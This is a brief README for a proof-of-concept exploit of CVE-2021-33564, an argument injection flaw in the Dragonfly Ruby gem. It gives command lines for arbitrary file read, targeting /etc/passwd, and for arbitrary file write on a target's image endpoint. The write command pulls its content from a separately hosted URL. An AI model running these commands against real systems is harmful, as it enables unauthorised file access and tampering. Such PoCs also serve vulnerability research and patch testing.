CVE-2021-33564 PoC
Exploit script for CVE-2021-33564 (Argument Injection in Dragonfly Ruby Gem).
Usage
Arbitrary File Read
python3 poc.py -u https://<target_url>/system/refinery/images -r /etc/passwd
Arbitrary File Write
python3 poc.py -u https://<target_url>/system/refinery/images -w public/test.txt -c test.txt -lu http://<local_url>
For more information, please visit the blog.